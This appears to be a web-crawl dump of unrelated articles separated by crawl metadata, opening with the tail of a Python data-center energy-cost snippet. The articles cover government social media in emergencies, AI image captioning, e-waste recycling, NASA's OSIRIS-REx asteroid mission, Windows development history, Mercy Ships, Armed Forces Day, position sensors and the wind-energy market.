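def annual_energy_cost(servers, watts_per_server, overhead_factor,
                       price_per_kwh):
    # overhead_factor ~2.0 means cooling and power distribution roughly
    # double the IT load, matching the 0.6% -> 1.2% jump cited above.
    it_load_kw = servers * watts_per_server / 1000.0
    total_kwh = it_load_kw * overhead_factor * HOURS_PER_YEAR
    return total_kwh * price_per_kwh

if __name__ == "__main__":
    cost = annual_energy_cost(servers=10_000_000,     # hypothetical fleet size
                              watts_per_server=200,   # hypothetical average draw
                              overhead_factor=2.0,
                              price_per_kwh=0.08)
    print(f"Estimated annual electricity cost: ${cost / 1e9:.1f} billion")
```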
<urn:uuid:d9a6abeb-138f-402d-8c8f-4aa2cf9d3760>
CC-MAIN-2017-09
http://www.cioinsight.com/print/c/a/Past-News/Data-Center-Power-Consumption-on-the-Rise-Report-Shows
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171632.91/warc/CC-MAIN-20170219104611-00244-ip-10-171-10-108.ec2.internal.warc.gz
en
0.933656
718
2.5625
3
Social media is changing the way government communicates with its citizens. A 2011 study by the Fels Institute of Government at the University of Pennsylvania found that 90 percent of cities and counties had established a presence on social networking channels such as Twitter and Facebook. In the intervening years, there has been a steady stream of reports about others working to close the gap.

Cities and counties have used social media to broaden transparency, increase citizen engagement and feedback, and improve public perception of what government does. As important as transparency and perception are, these somewhat intangible benefits are sometimes not enough to justify the investment to pursue anything more than a placeholder in social media. The ability to save lives changes everything, including thinking about the return on investment for social media in government. There have been three headline-grabbing examples in the last year.

During Hurricane Sandy, a determined social media manager effectively transformed the New York Fire Department's Twitter account (@FDNY) from a source of safety tips to a hub for coordinating emergency response when phone lines were down and people couldn't get through to 911 or 311. It also helped squash rumors circulating after the storm.

Twitter also quickly became the most effective channel for the Boston Police Department to get the word out when terror struck the Boston Marathon last April. Fueled by national media coverage, the follower count for the @bostonpolice Twitter account surged from an already impressive 50,000 to an extraordinary 300,000, becoming a beacon of clarity, 140 characters at a time, in a noisy and error-filled cacophony. As with Sandy, @bostonpolice was used to dispel false rumors in the hours after the bombing. It was also used to help ensure officer safety as out-of-town news crews descended on Boston, and to announce important developments. In fact, the first official announcement that suspect Dzhokhar Tsarnaev had been captured was delivered as, you guessed it, a tweet.

Every town experiences its share of emergency situations, whether it's a natural disaster or a crime that shakes the community. It is clear from the recent New York and Boston examples that in these types of situations, social media provides government with an incredibly powerful channel to squash rumors, disseminate official information and align community interests.

A social networking presence, however, is only as effective as its reach. A city or police Twitter account created as a placeholder is just that: a placeholder. It is not at all equipped to create the type of immediate response we saw in Boston. It is also unlikely that a dormant presence can be kickstarted quickly enough at the time of need. Most situations simply do not receive the type of attention and media coverage that gave the @bostonpolice Twitter account such an enormous boost. The reality is, when the situation arises, we must rely on the network and following we've already established across our social networking channels.

That's the urgency in rethinking government's approach to social media. There is a hard ROI to be realized when communities are in crisis. The same is true for social media's role in the early identification of public health concerns or even the mundane but important work of keeping traffic flowing after accidents and road closures.
The time and effort put into promoting your social networking presence, and building a truly engaged audience, is not just for fun and games. Nor does it always have to drive business metrics such as page views or building awareness, or even participation in government programs. Rather, public officials must come to think of building out a social network as a down payment on establishing the most rapid, viral and open communications link you can possibly create with your citizens. The type of communications link that can save lives, and it has. Your network keeps you safe and makes you strong ... if you have one.

To be clear, the investment required to build a social media following is non-trivial. Moreover, there needs to be oversight to ensure consistent and appropriate messaging, especially as staff members outside of your traditional communications team speak on behalf of their agencies. And, of course, attention must be paid to legal policies and requirements such as employee conduct rules and record retention.

Creating an active social media presence is a significant undertaking for government but, given the changing nature of emergency management and crime response, the investment in social media can serve the larger public policy priorities of public safety and emergency preparedness. It's not simply about likes and followers. It's about being able to communicate with your citizens in the most effective way possible in a time of need. It's about the potential to save lives.

Anil Chawla is an experienced technologist and entrepreneur, with a proven track record of working with businesses to address challenges related to social media. He has over a decade of experience creating software products, and has focused the last four years on developing social media technology. Mr. Chawla is the CEO of ArchiveSocial, which he founded to help government organizations navigate the important legal and regulatory challenges they face related to social media management.
<urn:uuid:6f8259a4-0df2-4cae-a8ab-c8bc8ec1e7db>
CC-MAIN-2017-09
http://www.govtech.com/internet/Industry-Perspective-Social-Media-is-Serious-Business-for-Government.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171632.91/warc/CC-MAIN-20170219104611-00244-ip-10-171-10-108.ec2.internal.warc.gz
en
0.953499
1,044
2.890625
3
Take a look at this new artificially intelligent natural language image processor from Google and Stanford: It was only recently that computer systems became smart enough to identify unknown objects in photographs. Even then, it has generally been limited to individual objects. Now, two separate teams of researchers at Google and Stanford University have created software able to describe entire scenes. This could lead to much better and more intelligent algorithms in the future. "A group of young people playing a game of frisbee." In the near term, computer vision systems that can discern the story in a picture will enable people to search photo or video archives and find highly specific images. Eventually, these advances will lead to robotic systems able to navigate unknown situations. Driverless cars would also be made safer. However, it also raises the prospect of even greater levels of government surveillance. What's the guess for near term? 1yr or 10?
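For anyone who wants to try scene description hands-on, here is a minimal sketch of what an off-the-shelf captioning model looks like today. This is not the Google/Stanford system described above; it assumes the Hugging Face "transformers" library and the publicly available "nlpconnect/vit-gpt2-image-captioning" checkpoint, and the image filename is just a placeholder.

```python
# Rough sketch of automatic scene description with an off-the-shelf model.
# Assumes: pip install transformers pillow torch, plus a local test image.

from transformers import pipeline

captioner = pipeline("image-to-text",
                     model="nlpconnect/vit-gpt2-image-captioning")

result = captioner("frisbee_game.jpg")   # hypothetical local image file
print(result[0]["generated_text"])       # e.g. "a group of people playing frisbee"
```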
<urn:uuid:08b2df31-9f38-4c1a-8d94-a1c599a08aae>
CC-MAIN-2017-09
https://ipvm.com/forums/video-surveillance/topics/natural-language-scene-processing-the-future-of-analytics
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501172649.58/warc/CC-MAIN-20170219104612-00596-ip-10-171-10-108.ec2.internal.warc.gz
en
0.964629
182
3.390625
3
On Global Earth Day weekend, more than 248 tons (225 metric tonnes) of electronic waste were kept out of landfills during a huge, multi-national e-waste collection event. Recycling facilities and collection points in North America, Austria, Belgium, Germany, India, the Netherlands, South Africa, Sweden and the United Kingdom received the waste that was otherwise destined for landfills around the globe. This is how it should be every day of the year. The purpose of this Earth Day event was to promote awareness of the need to recycle electrical and electronic equipment, no matter where in the world you live. 472,985 pounds of e-waste were collected in North America from 25 Earth Day events. In other countries, events included beach cleanups, outreach and educational events, monetary donations to local schools for every kilogram collected, and more.
<urn:uuid:dcf37226-6e7c-4537-8165-ccebb208bf12>
CC-MAIN-2017-09
http://anythingit.com/blog/2012/06/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501170521.30/warc/CC-MAIN-20170219104610-00540-ip-10-171-10-108.ec2.internal.warc.gz
en
0.956087
177
2.921875
3
NASA is less than a month away from launching a spacecraft designed to return a sample of an asteroid to Earth for the first time. Scientists are hoping the seven-year mission, set to launch on Sept. 8 from Cape Canaveral Air Force Station in Florida, will give them information about the makeup of the solar system, about life on Earth and the potential of life elsewhere in the universe, and about asteroids and how they could affect Earth. “This mission exemplifies our nation’s quest to boldly go and study our solar system and beyond to better understand the universe and our place in it,” said Geoff Yoder, acting associate administrator for NASA’s Science Mission Directorate. “NASA science is the greatest engine of scientific discovery on the planet and [this mission] embodies our directorate’s goal to innovate, explore, discover and inspire.” The spacecraft known as OSIRIS-REx (Origins, Spectral Interpretation, Resource Identification, Security-Regolith Explorer) is set to launch on top of an Atlas V 411 rocket. The spacecraft is expected to travel 1.2 billion miles and reach the near-Earth asteroid Bennu in 2018, and, while flying in formation with the asteroid, will begin making observations of it. The spacecraft will, for instance, track the asteroid's thermal emissions, which give scientists an idea of how the sun’s heat is affecting its trajectory. Osiris-REx also will look for natural satellites, measure its acceleration, map its surface and study its geological properties. The spacecraft then will map out potential sample sites. Osiris-REx will not, however, land on Bennu. Instead, it will draw close to it and use a robotic arm to reach out and release a five-second burst of nitrogen gas, kicking up loose rocks and soil that can then be captured by the spacecraft. The spacecraft will carry enough nitrogen to make three sample attempts. Scientists hope to collect between 2.1 ounces and 4.4 pounds of soil and rock samples. Osiris-REx is expected to leave the asteroid in March 2021 by firing its main engines to reach a speed of 716 mph. It is expected to return to Earth orbit in September 2023. The spacecraft would then jettison the capsule carrying the asteroid sample. Osiris-REx would remain in the Earth orbit, while the capsule makes its way down to the Utah desert on Sept. 24, 2023. The sample would be taken to the Johnson Space Center for analysis. Bennu, according to NASA, was likely formed by the rubble of an exploding star smashing into material in a nebula. Over the millions of years that it has traveled through space, the asteroid has been whittled down by the gravity of planets it’s passed. Because of its age, the asteroid is expected to contain materials that were present when the solar system was first formed and that may have had a role in the origin of life itself. By studying that material, scientists hope to get more information about the origin of the solar system and about life as we know it. This story, " NASA to send spacecraft on 1.2B-mile journey to asteroid" was originally published by Computerworld.
<urn:uuid:91b0f25b-1a0f-46f9-9c76-950924ef0ce8>
CC-MAIN-2017-09
http://www.itnews.com/article/3109105/space-technology/nasa-to-send-spacecraft-on-12b-mile-journey-to-asteroid.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171251.27/warc/CC-MAIN-20170219104611-00416-ip-10-171-10-108.ec2.internal.warc.gz
en
0.947572
671
3.4375
3
Microsoft's Mastery of Innovative Development Tools

Developing a relationship

Finally, there's the matter of applications. The key question, however, is what the application development space would look like if Windows had never emerged. When Microsoft started talking about Windows, Apple was a few years away from the release of its groundbreaking HyperCard, but it wasn't until 1990 that Windows 3.0 was actually useful, with another year before Visual Basic 1.0 made Windows development feasible for users. By 1991, NeXT Computer had introduced an object-oriented development platform; Apple's HyperCard 2.0 was already a year old and proving a fertile environment for innovative applications.

Visual Basic's model was a GUI with behaviors built behind it, while HyperCard's was an extensible data structure with powerful but approachable GUI tools. The HyperCard model might have been a better choice for the baby-duck imprinting of a generation of programmers. HyperCard "stacks" could easily have become an approachable model for distributed platforms and concurrent processing engines, and there were several competing Windows and cross-platform development tools that resembled HyperCard by the time Visual Basic arrived. Visual Basic had the edge, though, in exploiting the Windows APIs, and that was the advantage that mattered.

If there had been no Windows, we'd still be printing, we'd still be plugging and playing, and we'd still be developing applications. Windows was brilliantly positioned, however, so as to replace the problem of how to do things on PCs with the problem of how to do things on Windows. That's a problem that Microsoft always solved better than anyone else.

Peter Coffee can be reached at [email protected].

Check out eWEEK.com for Microsoft and Windows news, views and analysis.

It's impossible to overstate the importance of Microsoft's mastery and promotion of innovative development tools, plus ardent and effective courting of application developers, in achieving and maintaining the dominance of Windows.
<urn:uuid:e17e089a-f023-4bad-9a9b-c494ac01f5cc>
CC-MAIN-2017-09
http://www.eweek.com/c/a/Windows/If-Windows-Had-Never-Happened/2
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171936.32/warc/CC-MAIN-20170219104611-00116-ip-10-171-10-108.ec2.internal.warc.gz
en
0.952186
440
2.671875
3
Charity uses hospital ships to bring medical services such as tumor removal to countries in the Caribbean and West Africa.

Mercy Ships brings help and healing to poor nations around the world, according to Kelvin Burton, Mercy Ships' chief technology officer. Founded in 1978, the organization depends on the volunteer efforts of doctors, dentists, nurses, teachers, cooks, seamen, engineers, community developers and others.

Over the years, Burton said, Mercy Ships has: performed approximately 2 million services worth more than $250 million and has affected more than 2.5 million people; treated more than 300,000 people in village medical clinics; performed approximately 18,000 surgeries; performed approximately 110,000 dental treatments; and completed nearly 350 construction and agricultural projects. In addition, the Mercy Ships fleet has visited more than 500 ports in more than 50 developing nations and 17 developed nations.

Click here to read the related story on how Mercy Ships is using Borland's JBuilder.

"What we do is take our ... hospital ships to Third World situations, primarily West Africa and the Caribbean in the last few years," said Burton. "The Caribbean being places like the Dominican Republic, Honduras, Belize, Nicaragua and Guatemala. And in West Africa, it's been Benin, Togo and Sierra Leone, and most recently Liberia."

Burton said the United Nations pushed very hard for Mercy Ships to go to Liberia, and "we just sailed out of Monrovia to South Africa to do our annual refit of the ship, and then we'll be going back to Monrovia."

Indeed, the most visible part of Mercy Ships' efforts is the medical work the organization performs. "The surgeries we do are typically life-changing surgeries, like cataract removal, tumor removal, and various sorts of cleft lip and cleft palate surgeries, things that are totally debilitating but don't take dramatic amounts of surgery to produce radical changes," Burton said.

"So that's the focus of the surgery, and primarily because of the fact that it requires relatively short ward time and ward space is critical in these situations," Burton said. "We can help a whole lot more people if they don't have to spend three months recovering, and most of our patients can recover in a week."

Meanwhile, although Burton's IT staff does not produce systems for the medical operations of the ships, he said, Mercy Ships is seeking a grant to enable his staff to develop applications that will better enable doctors on the ships to consult with specialists remotely on cases that might require outside consultation.

Check out eWEEK.com for the latest news, reviews and analysis in programming environments and developer tools.
<urn:uuid:fcb2ec44-4407-4cfd-9fe7-e216db58a4b0>
CC-MAIN-2017-09
http://www.eweek.com/c/a/Application-Development/Mercy-Ships-Has-Helped-Millions
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501174163.72/warc/CC-MAIN-20170219104614-00468-ip-10-171-10-108.ec2.internal.warc.gz
en
0.95097
552
2.53125
3
Celebrating Our Military on Armed Forces Day 2014 / May 13, 2014

May 17 is Armed Forces Day in the U.S. Many nations around the world celebrate similar holidays on various dates throughout the year to honor their militaries, but the U.S. holiday was created in 1949 following the consolidation of the U.S. military under the Department of Defense.

This photo shows a Marine in the forest of Camp Geiger, N.C., during patrol week last year, a five-day training event that teaches infantry students basic offensive, defensive and patrolling techniques. This Marine is part of Delta Company, which was the first in the Marines to fully integrate females into an entire training cycle. The performance of Delta Company was used to determine the future use of women in combat-related military jobs.
<urn:uuid:93caa260-fb79-47da-b132-c4c5650b3582>
CC-MAIN-2017-09
http://www.govtech.com/photos/Photo-of-the-Week-Celebrating-Our-Military-on-Armed-Forces-Day-2014.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501174163.72/warc/CC-MAIN-20170219104614-00468-ip-10-171-10-108.ec2.internal.warc.gz
en
0.969964
165
2.828125
3
Global Position Sensor Market Research Report

Sensors are usually classified on the basis of their applications. For example, a sensor used for measuring pressure is known as a pressure sensor, and a sensor used for measuring humidity is known as a humidity sensor. A sensor used for measuring the distance travelled by an object with respect to a reference point is known as a position sensor. It measures an object's movement or displacement from a reference point or initial position. The motion of the object can be linear, angular or multi-axis. On the basis of motion, position sensors can be classified as linear position sensors or angular position sensors: a sensor used to detect movement in a straight line is termed a linear position sensor, while a sensor used to detect angular movement is termed an angular position sensor or rotational sensor. Position sensors can also be classified on the basis of the sensing principle used to measure displacement, such as potentiometric position sensors, capacitive position sensors, linear variable differential transformers, magnetostrictive linear position sensors, eddy current based position sensors, Hall effect based magnetic position sensors, fiber-optic position sensors and optical position sensors.

Potentiometric Position Sensor
This sensor utilizes the resistive effect for sensing. The basic principle is a resistive or conductive track. To measure the displacement of an object, a wiper is attached to the object or to a part of it, and this wiper stays in contact with the track. Potentiometric position sensors are convenient to use, low cost and low technology. The main disadvantage is wear as a result of the moving parts; other disadvantages are low accuracy and repeatability, and limited frequency response. The three main types of potentiometers are: a) wire wound, b) cermet, c) plastic film.

Linear Variable Differential Transformer
This is a type of position sensor that is free from mechanical wear problems. It falls into the category of inductive position sensors. It works on the same principle as an AC transformer and is used as a movement-measuring device. It is particularly useful for measuring linear displacement.

Eddy Current Sensor
This type is not used for measuring displacement or angular rotation. It is used to detect an object's presence in front of, or within close proximity to, the sensor. It is a non-contact position sensor based on the use of a magnetic field for detection.

Linear and Rotary Position Sensor Market
Linear and rotary position sensors and transducers respond to mechanical displacement in proportion to the input, producing an electrical signal. They find applications in machine tools, material handling, test equipment, robotics and more, and are typically used for position measurement by detecting angular or straight-line movement of an object.

Presence Sensing Edges
Presence sensing edges and presence sensing mats add up to the total position sensor market. Submarkets of presence sensing edges include machine safety. Key questions answered: What are the market estimates and forecasts; which of...

Presence Sensing Mats
Presence sensing mats and presence sensing edges add up to the total position sensor market.

Linear Displacement Sensor
Linear displacement sensors, together with proximity sensors and linear position sensors, form related segments of this market. Submarkets of this market are servo and magnetic field sensors. ...
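To illustrate the potentiometric principle described above, the short sketch below converts a raw analog-to-digital reading of the wiper voltage into a displacement: the wiper divides the supply voltage in proportion to position, so displacement is just that ratio scaled by the track length. The ADC resolution and track length are assumed for the example only.

```python
# Minimal sketch of the potentiometric position-sensing principle: the wiper
# voltage divides the supply in proportion to displacement, so position is a
# ratio scaled by track length. ADC resolution and track length are assumed.

def position_mm(adc_reading, adc_max=1023, track_length_mm=100.0):
    """Convert a raw ADC sample of the wiper voltage into displacement."""
    ratio = adc_reading / adc_max          # fraction of the supply voltage
    return ratio * track_length_mm

if __name__ == "__main__":
    for sample in (0, 512, 1023):          # ends and midpoint of travel
        print(sample, "->", round(position_mm(sample), 1), "mm")
```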
<urn:uuid:a1dcf6ee-f370-46db-8fc4-c231073897a5>
CC-MAIN-2017-09
http://www.micromarketmonitor.com/market-report/position-sensor-reports-1538486253.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171053.19/warc/CC-MAIN-20170219104611-00589-ip-10-171-10-108.ec2.internal.warc.gz
en
0.89201
652
2.96875
3
This report presents a brief introduction to wind energy and technologies available for horizontal wind turbines. A detailed taxonomy for horizontal axis wind turbines is presented covering parts of the turbine, control systems, applications among others. A detailed landscape analysis of patent and non-patent literature is done with a focus on Doubly-fed Induction Generators (DFIG) used in the horizontal axis wind turbines for efficient power generation. The product information of major players in the market is also captured for Doubly-fed Induction Generators. The final section of the report covers the existing and future market predictions for wind energy-based power generation. - We have been using wind power at least since 5000 BC to propel sailboats and sailing ships, and architects have used wind-driven natural ventilation in buildings since similarly ancient times. The use of wind to provide mechanical power came later. - Harnessing renewable alternative energy is the ideal way to tackle the energy crisis, with due consideration given to environmental pollution, that looms large over the world. - Renewable energy is also called "clean energy" or "green power" because it doesn’t pollute the air or the water. Wind energy is one such renewable energy source that harnesses natural wind power. Click on Wind Energy Background to read more about wind energy. In order to overcome the problems associated with fixed speed wind turbine system and to maximize the wind energy capture, many new wind farms are employing variable speed wind energy conversion systems (WECS) with doubly-fed induction generator (DFIG). It is the most popular and widely used scheme for the wind generators due to its advantages. For variable-speed systems with limited variable-speed range, e.g. ±30% of synchronous speed, the doubly-fed induction generator(DFIG) can be an interesting solution. This is mainly due to the fact that the power electronic converter only has to handle a fraction (20-30%) of the total power as the converters are connected to the rotor and not to the stator. Therefore, the losses in the power electronic converter can be reduced, compared to a system where the converter has to handle the total power. The overall structure of wind power generation through DFIG as shown in the figure below. The History of Wind Energy To read about the History of Wind Energy, click here Global Wind Energy Market - In the year 2010, the wind capacity reached worldwide 196’630 Megawatt, after 159’050 MW in 2009, 120’903 MW in 2008, and 93’930 MW in 2007. - Wind power showed a growth rate of 23.6 %, the lowest growth since 2004 and the second lowest growth of the past decade. - For the first time in more than two decades, the market for new wind turbines was smaller than in the previous year and reached an overall size of 37’642 MW, after 38'312 MW in 2009. - All wind turbines installed by the end of 2010 worldwide can generate 430 Tera watt hours per annum, more than the total electricity demand of the United Kingdom, the sixth largest economy of the world, and equaling 2.5 % of the global electricity consumption. - In the year 2010, altogether 83 countries, one more than in 2009, used wind energy for electricity generation. 52 countries increased their total installed capacity, after 49 in the previous year. - The turnover of the wind sector worldwide reached 40 billion Euros (55 billion US$) in 2010, after 50 billion Euros (70 billion US$) in the year 2009. 
The decrease is due to lower prices for wind turbines and a shift towards China. - China became number one in total installed capacity and the center of the international wind industry, and added 18’928 Megawatt within one year, accounting for more than 50 % of the world market for new wind turbines. - The wind sector in 2010 employed 670’000 persons worldwide. - Nuclear disaster in Japan and oil spill in Gulf of Mexico will have long-term impact on the prospects of wind energy. Governments need to urgently reinforce their wind energy policies. - WWEA sees a global capacity of 600’000 Megawatt as possible by the year 2015 and more than 1’500’000 Megawatt by the year 2020. Source: World Wind Energy Report, 2010 Global Market Forecast - Global Wind Energy Outlook 2010, provides forecast under three different scenarios - Reference, Moderate and Advanced. - The Global Cumulative Wind Power Capacity is estimated to reach 572,733 MW by the year 2030, under the Reference Scenario - The Global Cumulative Wind Power Capacity is estimated to reach 1,777,550 MW by the year 2030, under the Moderate Scenario - The Global Cumulative Wind Power Capacity is estimated to reach 2,341,984 MW by the year 2030, under the Advanced Scenario - The following chart shows the Global Cumulative Wind Power Capacity Forecast,under the different scenarios: Source: Global Wind Energy Outlook 2010 Market Growth Rates - The growth rate is the relation between the new installed wind power capacity and the installed capacity of the previous year. - With 23.6 %, the year 2010 showed the second lowest growth rate of the last decade. - Before 2010, the annual growth rate had continued to increase since the year 2004, peaking in 2009 at 31.7%, the highest rate since 2001. - The highest growth rates of the year 2010 by country can be found in Romania, which increased its capacity by 40 times. - The second country with a growth rate of more than 100 % was Bulgaria (112%). - In the year 2009, four major wind markets had more than doubled their wind capacity: China, Mexico, Turkey, and Morocco. - Next to China, strong growth could be found mainly in Eastern European and South Eastern European countries: Romania, Bulgaria, Turkey, Lithuania, Poland, Hungary, Croatia and Cyprus, and Belgium. - Africa (with the exception of Egypt and Morocco) and Latin America (with the exception of Brazil), are again lagging behind the rest of the world in the commercial use of wind power. - The Top 10 countries by Growth Rate are shown in the figure listed below (only markets bigger than 200 MW have been considered): Geographical Market Distribution - China became number one in total installed capacity and the center of the international wind industry, and added 18'928 Megawatt within one year, accounting for more than 50 % of the world market for new wind turbines. - Major decrease in new installations can be observed in North America and the USA lost its number one position in total capacity to China. - Many Western European countries are showing stagnation, whereas there is strong growth in a number of Eastern European countries. - Germany keeps its number one position in Europe with 27'215 Megawatt, followed by Spain with 20'676 Megawatt. - The highest shares of wind power can be found in three European countries: Denmark (21.0%), Portugal (18.0 %) and Spain (16.0%). - Asia accounted for the largest share of new installations (54.6%), followed by Europe (27.0%) and North America (16.7 %). 
- Latin America (1.2%) and Africa (0.4%) still played only a marginal role in new installations. - Africa: North Africa represents still lion share of installed capacity, wind energy plays hardly a role yet in Sub-Sahara Africa. - Nuclear disaster in Japan and oil spill in Gulf of Mexico will have long-term impact on the prospects of wind energy. Governments need to urgently reinforce their wind energy policies. Source: World Wind Energy Report, 2010 The regional breakdowns for the period 2009-2030 has been provided for the following three scenarios: Note: To know more about the Forecast Scenarios click here Country-wise Market Distribution - In 2010, the Chinese wind market represented more than half of the world market for new wind turbines adding 18.9 GW, which equals a market share of 50.3%. - A sharp decrease in new capacity happened in the USA whose share in new wind turbines fell down to 14.9% (5.6 GW), after 25.9% or 9.9 GW in the year 2009. - Nine further countries could be seen as major markets, with turbine sales in a range between 0.5 and 1.5 GW: Germany, Spain, India, United Kingdom, France, Italy, Canada, Sweden and the Eastern European newcomer Romania. - Further, 12 markets for new turbines had a medium size between 100 and 500 MW: Turkey, Poland, Portugal, Belgium, Brazil, Denmark, Japan, Bulgaria, Greece, Egypt, Ireland, and Mexico. - By end of 2010, 20 countries had installations of more than 1 000 MW, compared with 17 countries by end of 2009 and 11 countries byend of 2005. - Worldwide, 39 countries had wind farms with a capacity of 100 Megawatt or more installed, compared with 35 countries one year ago, and 24 countries five years ago. - The top five countries (USA, China, Germany, Spain and India) represented 74.2% of the worldwide wind capacity, significantly more than 72.9 % in the year. - The USA and China together represented 43.2% of the global wind capacity (up from 38.4 % in 2009). - The newcomer on the list of countries using wind power commercially is a Mediterranean country, Cyprus, which for the first time installed a larger grid-connected wind farm, with 82 MW. Source: World Wind Energy Report, 2010 The top 10 countries by Total Installed Capacity for the year 2010, is illustrated in the chart below: To view the Top 10 countries by different other parameters for the year 2010, click on the links below: Wind Energy Outlook for China - 2011 & Beyond Despite its rapid and seemingly unhampered expansion, the Chinese wind power sector continues to face significant challenges, including issues surrounding grid access and integration, reliability of turbines and a coherent strategy for developing China’s offshore wind resource. These issues will be prominent during discussions around the twelfth Five-Year Plan, which will be passed in March 2011. According to the draft plan, this is expected to reflect the Chinese government’s continuous and reinforced commitment to wind power development, with national wind energy targets of 90 GW for 2015 and 200 GW for 2020. For a detailed country profile of China please visit this China Wind Energy Profile Link Wind Energy Main market developments in 2010 Today the Indian market is emerging as one of the major manufacturing hubs for wind turbines in Asia. Currently, seventeen manufacturers have an annual production capacity of 7,500 MW. According to the WISE, the annual wind turbine manufacturing capacity in India is likely to exceed 17,000 MW by 2013. 
The Indian market is expanding with the leading wind companies like Suzlon, Vestas, Enercon, RRB Energy and GE now being joined by new entrants like Gamesa, Siemens, and WinWinD, all vying for a greater market share. Suzlon, however, is still the market leader with a market share of over 50%. The Indian wind industry has not been significantly affected by the financial and economic crises. Even in the face of a global slowdown, the Indian annual wind power market has grown by almost 68%. However, it needs to be pointed out that the strong growth in 2010 might have been stimulated by developers taking advantage of the accelerated depreciation before this option is phased out. For a detailed country profile of India please visit this India Wind Energy Profile Link - Vestas leads the Global Market in the 2010 with a 12% market share according to Make Consulting, while BTM Consulting reports it to have a 14.8% market share. - According to Make Consulting, the global market share of Vestas has decreased from 19% in 2008, to 14.5% in 2009, to 12% in 2010. - According to BTM Consulting, the global market share of Vestas has changed from 19% in 2008, to 12% in 2009, to 14.8% in 2010. - According to Make Consulting, the global market share of GE Energy has decreased from 18% in 2008, to 12.5% in 2009, to 10% in 2010. - The market share of world no. 2 Sinovel, has been constantly increasing, from 5% in 2008 , to 9.3% in 2009, to 11% in 2010 - The top 5 companies have been occupying more than half of the Global Market Share from 2008 to 2010 The chart given below illustrates the Global Market Share Comparison of Major Wind Energy Companies for the period 2008-2010, as provided by two different agencies, Make Consulting and BTM Consulting: - While Vestas is the Global Leader, it is the leader in only one of Top 10 markets, which is 10th placed Sweden - But, Vestas is ranked 2nd in 5 of Top 10 markets - Sinovel, ranked 2nd globally, features only once in the Top 3 Companies list in the Top 10 markets, but scores globally because it leads the largest market China - The table given below illustrates the Top 3 players in Top 10 Wind Energy Markets of the world: |Market||MW||No. 1||No. 2||No. 
3| |Source: BTM Consult - part of Navigant Consulting - March 2011| Source: BTM Consult Major Wind Turbine Suppliers |Turbine maker||Rotor blades||Gear boxes||Generators||Towers||Controllers| |Vestas||Vestas, LM||Bosch Rexroth, Hansen, Wingery, Moventas||Weier, Elin, ABB, LeroySomer||Vestas, NEG, DMI||Cotas (Vestas),| |GE energy||LM, Tecsis||Wingery, Bosch, Rexroth, Eickhoff, GE||Loher, GE||DMI, Omnical, SIAG||GE| |Gamesa||Gamesa, LM||Echesa (Gamesa), Winergy, Hansen||Indar (Gamesa), Cantarey||Gamesa||Ingelectric (Gamesa)| |Enercon||Enercon||Direct drive||Enercon||KGW, SAM||Enercon| |Siemens, LM||Winergy||ABB||Roug, KGW||Siemens, KK Electronic| |Suzlon||Suzlon||Hansen, Winergy|| Suzlon, |Suzlon||Suzlon, Mita Teknik| |Repower||LM||Winergy, Renk, Eickhoff||N/A||N/A||Mita Teknik, ReGuard| |Nordex||Nordex||Winergy, Eickhoff, Maag||Loher||Nordex, Omnical||Nordex, Mita Teknik| |Source: BTM Consult| Products of Top Companies |1||Vestas||V80||Rated Power: 2.0 MW, Frequency: 50 Hz/60 Hz, Number of Poles: 4-pole, Operating Temperature: -30°C to 40°| |2||Vestas||V90||Rated Power: 1.8/2.0 MW, Frequency : 50 Hz/60 Hz, Number of Poles : 4-pole(50 Hz)/6-pole(60 Hz), Operating Temperature: -30°C to 40°| |3||Vestas||V90 Offshore||Rated Power: 3.0 MW, Frequency: 50 Hz/60 Hz, Number of Poles: 4-pole, Operating Temperature: -30°C to 40°| |4||North Heavy Company||2 MW DFIG||Rated Power: 2.0 MW, Rated Voltage: 690V, Rated Current: 1670A, Frequency: 50Hz, Number of Poles : 4-pole, Rotor Rated Voltage: 1840V, Rotor Rated Current 670A, Rated Speed: 1660rpm; Power Speed Range: 520-1950 rpm, Insulation Class: H, Protection Class: IP54, Motor Temperature Rise =<95K| |5||Gamesa||G90||Rated Voltage: 690 V, Frequency: 50 Hz, Number of Poles: 4, Rotational Speed: 900:1,900 rpm (rated 1,680 rpm) (50Hz); Rated Stator Current: 1,500 A @ 690 V, Protection Class: IP 54, Power Factor(standard): 0.98 CAP - 0.96 IND at partial loads and 1 at nominal power, Power Factor(Optional): 0.95 CAP - 0.95 IND throughout the power range| |6||Nordex||N80||Rated Power: 2.5 MW, Rated Voltage: 690V, Frequency: 50/60Hz, Cooling Systems: liquid/air| |7||Nordex||N90||Rated Power: 2.5 MW, Rated Voltage: 690V, Frequency: 50/60Hz, Cooling Systems: liquid/air| |8||Nordex||N100||Rated Power: 2.4 MW, Rated Voltage: 690V, Frequency: 50/60Hz, Cooling Systems: liquid/air| |9||Nordex||N117||Rated Power: 2.5 MW, Rated Voltage: 690V, Frequency: 50/60Hz, Cooling Systems: liquid/air| |11||Xian Geoho Energy Technology||1.5MW DFIG||Rated Power: 1550KW, Rated Voltage: 690V, Rated Speed: 1755 r/min, Speed Range: 975~1970 r/min, Number of Poles: 4-pole, Stator Rated Voltage: 690V±10%, Stator Rated Current: 1115A; Rotor Rated Voltage: 320V, Rotor Rated Current: 430A, Winding Connection: Y / Y, Power Factor: 0.95(Lead) ~ 0.95Lag, Protection Class: IP54, Insulation Class: H, Work Mode: S1, Installation ModeI: M B3, Cooling Mode: Air cooling, Weight: 6950kg| |12||Tecowestinghouse||TW450XX (0.5-1 KW)||Rated Power: 0.5 -1 KW, Rated Voltage: 460/ 575/ 690 V, Frequency: 50/ 60 Hz, Number of Poles: 4/6, Ambient Temp.(°C): -40 to 50, Speed Range (% of Synch. Speed): 68% to 134%, Power Factor (Leading): -0.90 to +0.90 , Insulation Class: H/F, Efficiency: >= 96%| |13||Tecowestinghouse||TW500XX (1-2 KW)||Rated Power: 1-2 kW, Rated Voltage: 460/ 575/ 690 V, Frequency: 50/ 60 Hz, Number of Poles: 4/6, Ambient Temp.(°C): -40 to 50; Speed Range (% of Synch. 
